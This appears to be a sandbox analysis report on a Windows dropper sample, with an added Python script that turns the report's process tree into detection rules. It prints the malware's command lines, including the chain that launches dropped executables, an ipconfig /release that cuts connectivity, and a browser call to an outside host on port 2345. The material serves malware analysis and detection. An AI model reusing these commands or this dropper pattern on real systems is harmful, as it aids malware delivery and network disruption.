Analysis

  • max time kernel
    148s
  • max time network
    180s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    03-12-2022 17:59

General

  • Target

    8499809f4b3f8f8ac2fa568c2d762d162b8376610e112339512aaad9f382b504.exe

  • Size

    361KB

  • MD5

    83c4c622187ef9cd7b756c27281e0608

  • SHA1

    5f59b4f46fdf971f127545f2658af7b802e5f4fe

  • SHA256

    8499809f4b3f8f8ac2fa568c2d762d162b8376610e112339512aaad9f382b504

  • SHA512

    418ced6a56d3ebf45058bb0d1133eb9597c15dd6d823d0af435735d63382ae706a5f0edb34673ada9ecbbf25cbd8252dc10197177c382ae93a04ff4c367c2e6a

  • SSDEEP

    6144:eflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:eflfAsiVGjSGecvX

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses the ipconfig command-line utility. Here it is invoked with /release (see the process tree below), which drops the host's DHCP lease rather than merely displaying the network configuration.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8499809f4b3f8f8ac2fa568c2d762d162b8376610e112339512aaad9f382b504.exe
    "C:\Users\Admin\AppData\Local\Temp\8499809f4b3f8f8ac2fa568c2d762d162b8376610e112339512aaad9f382b504.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1848
    • C:\Temp\vupgeaytsjecbwvq.exe
      C:\Temp\vupgeaytsjecbwvq.exe run
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\temp\CreateProcess.exe
        C:\temp\CreateProcess.exe C:\Temp\vrokkgdrnn.exe ups_run
        3⤵
        • Executes dropped EXE
        PID:576
        • C:\Temp\vrokkgdrnn.exe
          C:\Temp\vrokkgdrnn.exe ups_run
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1664
          • C:\temp\CreateProcess.exe
            C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
            5⤵
            • Executes dropped EXE
            PID:560
            • C:\windows\system32\ipconfig.exe
              C:\windows\system32\ipconfig.exe /release
              6⤵
              • Gathers network information
              PID:1516
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1320
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1320 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1136
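The tree above is a dropper chain: the sample writes vupgeaytsjecbwvq.exe to C:\Temp, that binary uses a 3 KB CreateProcess.exe helper to proxy-launch a second dropped executable (vrokkgdrnn.exe ups_run) and then ipconfig /release, and the sample itself opens Internet Explorer on http://xytets.com:2345/t.asp?os=home. The following is an added example, not part of the sandbox report or of the sample: it re-creates the report's process tree as event records (same PIDs, images and command lines) and runs four detection rules over them. The rule names, the list of drop directories, the browser set and the port whitelist are assumptions of this example.

```python
"""Detection logic run over the sandbox process tree.

Added example, not part of the report. EVENTS is constructed from the
report's process tree; DROP_DIRS, BROWSERS and the rule names are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import urlsplit

SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\8499809f4b3f8f8ac2fa568c2d762d162b8376610e112339512aaad9f382b504.exe")
IE64 = r"C:\Program Files\Internet Explorer\iexplore.exe"
IE32 = r"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int        # 0 marks the submitted sample (root of the tree)
    image: str
    cmdline: str


# Constructed from the report: one record per process in the tree.
EVENTS = [
    Proc(1848, 0, SAMPLE, f'"{SAMPLE}"'),
    Proc(2044, 1848, r"C:\Temp\vupgeaytsjecbwvq.exe", r"C:\Temp\vupgeaytsjecbwvq.exe run"),
    Proc(576, 2044, r"C:\temp\CreateProcess.exe",
         r"C:\temp\CreateProcess.exe C:\Temp\vrokkgdrnn.exe ups_run"),
    Proc(1664, 576, r"C:\Temp\vrokkgdrnn.exe", r"C:\Temp\vrokkgdrnn.exe ups_run"),
    Proc(560, 1664, r"C:\temp\CreateProcess.exe",
         r"C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release"),
    Proc(1516, 560, r"C:\windows\system32\ipconfig.exe",
         r"C:\windows\system32\ipconfig.exe /release"),
    Proc(1320, 1848, IE64, f'"{IE64}" http://xytets.com:2345/t.asp?os=home'),
    Proc(1136, 1320, IE32, f'"{IE32}" SCODEF:1320 CREDAT:275457 /prefetch:2'),
]

# Assumed user-writable drop locations and browser image names (matched case-insensitively).
DROP_DIRS = ("c:\\temp\\", "\\appdata\\local\\temp\\")
BROWSERS = {"iexplore.exe"}
_IMAGE_TOKEN = re.compile(r'^\s*(?:"[^"]*"|\S+)\s*')   # leading quoted or bare image path
_URL = re.compile(r"https?://\S+", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def args_of(cmdline: str) -> str:
    """Command line with its image token removed and whitespace collapsed."""
    return " ".join(_IMAGE_TOKEN.sub("", cmdline, count=1).split())


def analyze(events: List[Proc]) -> Dict[int, List[str]]:
    """Return {pid: [finding, ...]} for every process that trips a rule."""
    by_pid = {p.pid: p for p in events}
    children: Dict[int, List[Proc]] = {}
    for p in events:
        children.setdefault(p.ppid, []).append(p)
    findings: Dict[int, List[str]] = {}

    def hit(pid: int, msg: str) -> None:
        findings.setdefault(pid, []).append(msg)

    for p in events:
        img = p.image.lower()
        # Rule 1: executable running out of a drop directory.
        if any(d in img for d in DROP_DIRS):
            hit(p.pid, "exec_from_temp")
        # Rule 2: proxy launcher. If a child's whole command line equals this
        # process's arguments, this image exists only to spawn that child.
        mine = args_of(p.cmdline).lower()
        for c in children.get(p.pid, []):
            if mine and mine == " ".join(c.cmdline.split()).lower():
                hit(p.pid, f"proxy_launch:{c.pid}")
        # Rule 3: ipconfig /release drops the DHCP lease and cuts connectivity.
        if basename(p.image) == "ipconfig.exe" and "/release" in p.cmdline.lower():
            hit(p.pid, "ipconfig_release")
        # Rule 4: browser started with a URL by something that is not a browser.
        parent = by_pid.get(p.ppid)
        url = _URL.search(p.cmdline)
        if (basename(p.image) in BROWSERS and url and parent
                and basename(parent.image) not in BROWSERS):
            u = urlsplit(url.group(0))
            tag = f"browser_url:{u.hostname}:{u.port}"
            if u.port not in (None, 80, 443):
                tag += ":nonstandard_port"
            hit(p.pid, tag)
    return findings


def lineage(events: List[Proc], pid: int) -> List[int]:
    """Root-to-leaf PID chain for one process, so a hit can be tied back to the sample."""
    by_pid = {p.pid: p for p in events}
    chain: List[int] = []
    while pid in by_pid:
        chain.append(pid)
        pid = by_pid[pid].ppid
    return chain[::-1]


if __name__ == "__main__":
    for pid, tags in analyze(EVENTS).items():
        print(pid, " -> ".join(map(str, lineage(EVENTS, pid))), tags)
```

Rule 2 is the one worth carrying into production telemetry: a parent whose arguments are exactly the child's command line is the signature of a minimal launcher stub, and it fires here twice (PID 576 launching 1664, PID 560 launching 1516) without needing the stub's file hash.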

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Temp\CreateProcess.exe

    Filesize

    3KB

    MD5

    1f21688ce0a7888878d4a097049b28cb

    SHA1

    6103dd2ffc369d56d176633764ff073881ff1a3d

    SHA256

    ef06b0cb906e3bcb4d6f234198c10c680545a38ef438de9aca14208f6589821a

    SHA512

    a77cc000bc59e9fd6076d21435ebf70f72e69b26bba43dc14c4539502cd6af25c80123df140cdaa79b4e8bd8fd7ee3c4f7807bedfa6905d821b5612e0c5ff2d2

  • C:\Temp\vrokkgdrnn.exe

    Filesize

    361KB

    MD5

    8bce9db40a7db60e6747caec76f33734

    SHA1

    07b0e132c2719672daf63684ae43ffdd36db0674

    SHA256

    fe9192a6da0693cb5c433555afe68dba297fa6a1c4682c9a4f4d99200542a848

    SHA512

    d4d0b777e1eeeec8184b85fc355b11124c08f9f9ec48c30c936e46886f6aedd2e7055c88632520770871f812fac8f3a9e48cbd2cf6864a90370e373231634160

  • C:\Temp\vupgeaytsjecbwvq.exe

    Filesize

    361KB

    MD5

    8a1c9f6b8cd710fc4be2602452ffef38

    SHA1

    45c580d7176ce9442d389b8bf2825534ee7fb228

    SHA256

    a7ea27ed13cc3091e7b7cea56bbb3370576c3756e018c7c368c1b25e6f5b8d3f

    SHA512

    269fc28f7d225180990cad264342b60be7427914ef619df9d48e22516d4b5f005efa1c549642b7cf0bde171c6f383c20f9f417e240e68b3b46f7d88d72c27769

  • C:\temp\CreateProcess.exe

    Filesize

    3KB

    MD5

    1f21688ce0a7888878d4a097049b28cb

    SHA1

    6103dd2ffc369d56d176633764ff073881ff1a3d

    SHA256

    ef06b0cb906e3bcb4d6f234198c10c680545a38ef438de9aca14208f6589821a

    SHA512

    a77cc000bc59e9fd6076d21435ebf70f72e69b26bba43dc14c4539502cd6af25c80123df140cdaa79b4e8bd8fd7ee3c4f7807bedfa6905d821b5612e0c5ff2d2

  • \Temp\CreateProcess.exe

    Filesize

    3KB

    MD5

    1f21688ce0a7888878d4a097049b28cb

    SHA1

    6103dd2ffc369d56d176633764ff073881ff1a3d

    SHA256

    ef06b0cb906e3bcb4d6f234198c10c680545a38ef438de9aca14208f6589821a

    SHA512

    a77cc000bc59e9fd6076d21435ebf70f72e69b26bba43dc14c4539502cd6af25c80123df140cdaa79b4e8bd8fd7ee3c4f7807bedfa6905d821b5612e0c5ff2d2

  • \Temp\vupgeaytsjecbwvq.exe

    Filesize

    361KB

    MD5

    8a1c9f6b8cd710fc4be2602452ffef38

    SHA1

    45c580d7176ce9442d389b8bf2825534ee7fb228

    SHA256

    a7ea27ed13cc3091e7b7cea56bbb3370576c3756e018c7c368c1b25e6f5b8d3f

    SHA512

    269fc28f7d225180990cad264342b60be7427914ef619df9d48e22516d4b5f005efa1c549642b7cf0bde171c6f383c20f9f417e240e68b3b46f7d88d72c27769

  • memory/560-65-0x0000000000000000-mapping.dmp

  • memory/576-61-0x0000000000000000-mapping.dmp

  • memory/2044-55-0x0000000000000000-mapping.dmp